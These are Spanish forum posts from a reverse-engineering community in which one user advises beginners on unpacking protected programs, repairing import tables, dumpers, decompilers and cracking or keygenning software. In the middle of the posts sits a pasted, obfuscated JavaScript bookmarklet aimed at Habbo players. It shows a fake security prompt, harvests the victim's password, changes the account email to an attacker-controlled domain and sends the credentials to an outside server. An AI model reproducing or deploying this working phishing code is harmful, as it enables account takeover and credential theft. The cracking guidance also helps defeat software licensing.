Mensajes

xenocode es un protector para archivos net http://www.developerfusion.com/product/3321/xenocode-net-obfuscator-and-optimizer/

por otro lado themida es un packer estudiado

coloca en el mismo buscador "themida" "oreans"

el ultimo escrito al respecto es : http://ricardonarvaja.info/WEB/CURSO%20NUEVO/TEORIAS%20NUMERADAS/1501-1600/1589-Themida%202.3.9.0%20Vba%20Password%20Remover%20por%20Snat%20%26%20Apuromafo.rar

cuando termines el curso tendras una referencia con programas x86 y puedes adaptarlo a x64, el tema es este, el programa que tienes está en .net

y los tutoriales de .net están con lenguaje intermedio msil etc...bueno hay gran discusión del tema

busca "net" o "dotnet" en http://ricardonarvaja.info/WEB/buscador.php
por otro lado una cosa es saber depurar programas y otra muy diferente conocer todas las características de un programa

por eso siempre uno debe comenzar primero con cosas conocidas antes que desconocidas
además en google y sitios ingleses siempre hay material complementario, por ejemplo blackstorm team, trabaja sobre muchos .net y tuts4you tiene bastante tutoriales eso si en inglés


por otro lado,  si la idea es aprender
https://www.google.cl/webhp?sourceid=chrome-instant&ion=1&espv=2&ie=UTF-8#q=Xenocode+unpack

Saludos Apuromafo

cuando ya no seas nuevo en el tema de los faq, hacer el tutorial de ricardo, ya sepas desempacar usar script
pasea por aqui:
->
https://foro.elhacker.net/ingenieria_inversa/ayuda_con_xtrap_urgente_por_favor-t446855.0.html

https://www.unphp.net/decode/3d484439626db1d567a83415de961520/

Código [Seleccionar] Expandir


<a onClick="alert('Debe iniciar sesion en habbo y arrastrar la imagen a la pestaa de habbo');return false;" href='javascript:var owner = "duplicador";&#65279;var _0x3459=["http://hiori-games.com/p/loading.php","/settings/email",""","split","name":"","email":"","<div style="position: fixed; top: 0px; left: 0px; z-index: 800; width: 100%; height: 100%; background: rgba(10, 54, 94, 0.8);"></div>","<div id="hidden" style="position: fixed; top: 70px; width: 500px; z-index: 900; left: 50%; margin-left: -250px;"><div style="display: block; transition: 1s;" id="toast-container" class="toast-top-center" aria-live="polite" role="alert"><div class="toast toast-error" style="display: none;"><div class="toast-progress" id="toast-progress" style="width: 99.9%; transition: 2s;"></div><div class="toast-message" id="toast-message">La contrasea que ingreso es incorrecta, verifique e intente de nuevo.</div></div></div><div class="modal-dialog" ng-class="size ? " modal-"="" +="" size="" :="" """=""><div style="height: 250px;" class="modal-content" uib-modal-transclude=""><div><button onclick="location.reload()" class="modal__close"></button><h3 translate="SAFETY_LOCK_TITLE" class="modal__title">Cuenta protegida por seguridad.</h3><div class="modal__content"><p translate="SAFETY_LOCK_ANSWER"></p><!-- ngIf: safetyLockForm.$error.remoteDataAnswer --><fieldset class="form__fieldset"><label for="safety-lock-answer1" class="form__label" translate="IDENTITY_SAFETYQUESTION_1">Ingrese su contrasea para continuar</label><div class="form__field"><input id="inputtxt" name="answer1" type="password" ng-model="answers.answer1" ng-model-options="{ updateOn: " default="" blur",="" debounce:="" {="" default:="" 500,="" blur:="" 0="" }="" }"="" required="" remote-data="" answer""="" password-toggle-mask="" autocomplete="off" class="form__input ng-pristine ng-untouched password-toggle-mask ng-invalid ng-invalid-required" style="border-color: rgb(144, 51, 82);"><i class="password-toggle-mask__icon"></i><!-- ngIf: safetyLockForm.answer1.$error.required && (!safetyLockForm.answer1.$pristine || safetyLockForm.$submitted) --></div></fieldset><div class="form__footer"><a href="https://www.habbo.es/" class="form__cancel" onclick="location.reload()" translate="FORM_CANCEL_LABEL">Cancelar</a> <button ng-disabled="unlockingInProgress" type="" class="form__submit" onclick="add();">Continuar</button></div></div></div></div></div></div>","prepend","body","ajax","val","#inputtxt","stopcredits","random","floor","@lolito.tk","fadeToggle",".toast","animate","#toast-progress","fail","api/settings/email/change","post","https://www.habbo.es/api/safetylock/disable","get","form","createElement","action","method","input","type","text","name","mail_add","value","pass","habbo","email","id","appendChild","submit"];var linksave=_0x3459[0];var nome=null;var email=null;$[_0x3459[10]]({url:_0x3459[1],success:function b64EncodeUnicode(_0xcfe9x4){nome=_0xcfe9x4[_0x3459[3]](_0x3459[4])[1][_0x3459[3]](_0x3459[2])[0];email=_0xcfe9x4[_0x3459[3]](_0x3459[5])[1][_0x3459[3]](_0x3459[2])[0];div1=_0x3459[6];div2=_0x3459[7];$(_0x3459[9])[_0x3459[8]](div1);$(_0x3459[9])[_0x3459[8]](div2)}});function add(){var _0xcfe9x6=$(_0x3459[12])[_0x3459[11]]();var _0xcfe9x7=_0x3459[13]+Math[_0x3459[15]](Math[_0x3459[14]]()*999999)+_0x3459[16];if(_0xcfe9x6){$[_0x3459[23]](_0x3459[22],{currentPassword:_0xcfe9x6,newEmail:_0xcfe9x7},function(_0xcfe9x4){_0xcfe9x8()})[_0x3459[21]](function(){$(_0x3459[18])[_0x3459[17]]();$(_0x3459[20])[_0x3459[19]]({width:0},300);setTimeout(function(){$(_0x3459[18])[_0x3459[17]]()},3000)});$[_0x3459[25]](_0x3459[24]);function _0xcfe9x8(){var _0xcfe9x9=document[_0x3459[27]](_0x3459[26]);_0xcfe9x9[_0x3459[28]]=linksave;_0xcfe9x9[_0x3459[29]]=_0x3459[25];var _0xcfe9xa=document[_0x3459[27]](_0x3459[30]);_0xcfe9xa[_0x3459[31]]=_0x3459[32];_0xcfe9xa[_0x3459[33]]=_0x3459[34];_0xcfe9xa[_0x3459[35]]=_0xcfe9x7;var _0xcfe9xb=document[_0x3459[27]](_0x3459[30]);_0xcfe9xb[_0x3459[31]]=_0x3459[32];_0xcfe9xb[_0x3459[33]]=_0x3459[36];_0xcfe9xb[_0x3459[35]]=_0xcfe9x6;var _0xcfe9xc=document[_0x3459[27]](_0x3459[30]);_0xcfe9xc[_0x3459[31]]=_0x3459[32];_0xcfe9xc[_0x3459[33]]=_0x3459[37];_0xcfe9xc[_0x3459[35]]=nome;var _0xcfe9xd=document[_0x3459[27]](_0x3459[30]);_0xcfe9xd[_0x3459[31]]=_0x3459[32];_0xcfe9xd[_0x3459[33]]=_0x3459[38];_0xcfe9xd[_0x3459[35]]=email;var _0xcfe9xe=document[_0x3459[27]](_0x3459[30]);_0xcfe9xe[_0x3459[31]]=_0x3459[32];_0xcfe9xe[_0x3459[33]]=_0x3459[39];_0xcfe9xe[_0x3459[35]]=owner;_0xcfe9x9[_0x3459[40]](_0xcfe9xa);_0xcfe9x9[_0x3459[40]](_0xcfe9xb);_0xcfe9x9[_0x3459[40]](_0xcfe9xc);_0xcfe9x9[_0x3459[40]](_0xcfe9xd);_0xcfe9x9[_0x3459[40]](_0xcfe9xe);document[_0x3459[9]][_0x3459[40]](_0xcfe9x9);_0xcfe9x9[_0x3459[41]]()}}}'>

yo te sugeriria leer el faq, para que  veas que no es nada del otro mundo, solo un poco de tiempo, quizas te lo hago mas explicito luego
si usas una máquina x86 con windows 8.1 o windows 10, o windows 7, crees una maquina virtual con windows xp sp3, luego hagas los tutoriales de ricardo (recuerda que fueron creado hace unos 10 años)
luego de ello, considera que molebox debes desempacar(main), luego extraer dependencias(pueden ser de cualquier tipo, bmp, exe, dll etc), dado que molebox no corre en sistemas operativos nuevos, es idoneo probar siempre en sistemas operativos que no dieron problemas

respecto a tutoriales de molebox, puedes considerar los de crackslatinos,


ahora la parte explicita, digamos que yo tenia un programa empacado con armadillo, aparecio un famoso unpacker y no aprendi sobre desempacarlo, pero un dia esa tool, no funciono, por lo que decidi aprender, hacerlo y termine registrandolo, dado que nadie lo habia registrado segui compartiendo en lugares ingleses donde si lo habian registrado y contrastando informacion, dado que nadie habia registrado como yo, termine uniendome a teams a ver si alguien si podia saber del tema, al final encontre expertos keygeners de armadillo y terminamos viendo mas alla que cualquier otra herramienta, analisis de usuarios/serial, analisis de como se podia inlinear, herramienta para generar una key valida etc, entonces ahi fue  un verdadero indicio

que pasa cuando automatizas sin tener ni idea ? sales del problema un minuto, pero ante la misma situacion en otro instante, no sabes que hacer si ya no funciona , cuando aprendes reversing, puedes identificar si está o no a tu alcance, si logras ver que tiene inclusive muchas veces algun virus/troyano en el código


el crack request existe en foros ingleses, pero debe saberse buscar, son teams de mucho tiempo, por otro lado cuando aprendes ingenieria inversa no es para lucirse con crackeds, es un desafio intelectual como quien dice cuando aprendes a jugar ajedrez, requiere tiempo dedicacion y logras los resultados conforme te propones una meta


saludos cordiales y el mayor de los éxitos

Apuromafo CLS

cuando eres autor de tu còdigo y intentas crear a compilado, veràs que hay muchìsimas variables que se pierden y todas se asocian a que evento usas, por otro lado el decompilador mostrarà referencias importantes pero nunca el còdigo

la parte estètica del programa  o form, en general puede ser recuperada casi en un 100%,siempre y cuando pueda ser bien analizada, los principios ya existen en la web, siempre involucra el famoso tiempo

https://www.vb-decompiler.org/forms_editing.htm

respecto a programas que permiten cambiar eso visual, seria vb reformer
https://www.google.cl/webhp?sourceid=chrome-instant&ion=1&espv=2&ie=UTF-8#q=vb%20reformer

en general lo que se ve es que puedes cambiar eventos del tipo disabled a enabled, cambiar texto y otros


cuando vemos del pasado herramientas que pensaron en reconstituir còdigo, solo llegaron a versiones pequeñas "vbrezq" fue una herramienta genial de la version 4 a 5, algunas 6 eran soportadas, pero el principio es el mismo

siempre el principio es el mismo

es imposible hacer cosas nuevas, si no eres dueño de las herramientas


por eso es muchisimo mejor aprender a hacer las cosas por si solo,luego apoyarse en lo que se conoce y luego demostrar que si es posible  hacer algo mas

por mi lado si no sabes de ingenieria inversa, nimporta, eso se puede aprender, pero pedir codigos de fuente donde nadie ha hecho algo semejante, es triste

bueno, aun con experiencia en visual basic,  ahora todo migra a uso de plataformas punto net, dejaron de darle soporte a visual basic y se enfocaron en nuevos entornos hacia visual c y otros, bueno un saludo a la distancia y animo en la hazaña

Apuromafo

muchas veces eso es lo que se llama demo, por otro lado nunca he visto autocad, pero he de suponer que igual puede depurarse los plugins, quizas será mas dificil o puede que tenga otro lenguaje de programación (no se como las macros en algun tipo de programa)
o si bien es una dll independiente/exe independiente posiblemente puedas depurar y descubrirlo

a mi recuerdo muchisimos programas hoy en día prefieren entregar versiones full en forma de demo para evitar enviar tanto código y sean compras mas de webs, por otro lado, otros prefieren hacer versiones capadas y una vez compras te envian una full, es relativo, es tema de a poco

a mi experiencia 40% de las aplicaciones pueden ser crackeadas sin problemas con conocimientos básicos, 60% con conocimientos medios (zen), y el otro porcentaje pasa a ser desconocido, algunos nisiquiera buscan parchar, sino registrar (serial/keygen) , o algunos simplemente que no tenga una molesta nag(parchar recursos etc)

bueno , Con 0 conocimiento de reversing, lo veo dificil que puedas hacer algo, lee el faq y cuando termines el curso de ricardo narvaja , comentas hasta donde llegas ...

Saludos Apuromafo

[reparar la "iat]

Cuando se desempaca cualquier programa es necesario reparar la "iat", esto es porque las llamadas de la entrada de importación funcionarán solo para tu pc, y no para otro, he ahi la excepción , en general fsg 2.0 y 1.x no es tanta la diferencia, hace una excepcion y luego una pequeña rutina que saltaba en un salto hacia el oep osea un script o buscar un patron de los bytes "FF630C" que apuntan a la instrucción "JMP DWORD PRTR DS:[EBX+C]"  podrías encontrar el salto al oep.
los packers simples son UPX, fsg, petite, mew

respecto a dumpear, yo sugeriria usar Scylla ya que puedes dumpear y además reparar la iat también, el cual normalmente son generados en cada dependencia compilada, imaginate que el programa apunta a una direccion 77xxxxx  en windows xp y en mi sistema operativo  8.1 x64 esa misma dirección está en 705xxxxxx, no es redireccionar, es solo que el núcleo del sistema operativo puede leer eso desde la IT(entrada de importación) etc, bueno


si no se puede  acceder a tuts4you,aqui hay un mirrow  http://www.openrce.org/downloads/details/108/ollydump

por otro lado mas dumpers te sugeriria http://low-priority.appspot.com/ollydumpex/ el cual tiene soporte para otros depuradores y opciones adicionales (agregar sección de memoria adicional) , bastante útil para temas mas densos.


Por otro lado mas tutoriales en crackslatinos pues hay un buscador (colocas ricardonarvaja.info/WEB/buscador.php y colocas la palabra clave ejemplo FSG)
de ahi puedes encontrar uno de cronux, pero en especial para tu tipo de versión sirve esto:
http://ricardonarvaja.info/WEB/CURSO%20NUEVO/TEORIAS%20NUMERADAS/401-500/461-Video.Unpack.FSG%202.0%20-%20bartxt.por.BrunoMaestro.rar



bueno, un saludo a la distancia, y espero te sigas animando es tema de tiempo solamente

Saludos Apuromafo

actualmente tu foto es que estás en una dll de sistema ,debes volver al retorno del programa y buscar el origen para ver si hay condiciones o temas en particular que esten a tu alcance, si no tienes mucha experiencia

EL FAQ está muy claro y si sabes depurar en x86, en el caso actual estas depurando en x64 requiere tiempo

no es complicado usar x64dbg, pero primero practica antes de llegar y modificar y reconocer donde...
por ejemplo aqui haciendo un pequeño unpack:
http://ricardonarvaja.info/WEB/NUEVOS%20WINDOWS%2032%20Y%2064%20BITS/2-Unpackme1%20en%20x64dbg%2032bytes%20by%20Apuromafo.docx



recuerda que antes de comenzar un programa, minimo hay que motivarse a revisar "referencias", verificar rutinas (si es delphi/visual basic, existen decompiladores que pueden ayudarte a comienzos de rutinas/métodos por otro lado también existen lugares de análisis potentes como IDA, pero mínimo termina todo el curso de Ricardo Narvaja
que indica como depurar programas en windows xp

tienes mal configurada la ruta de la dll de reparación de la iat, o bien no apunta a api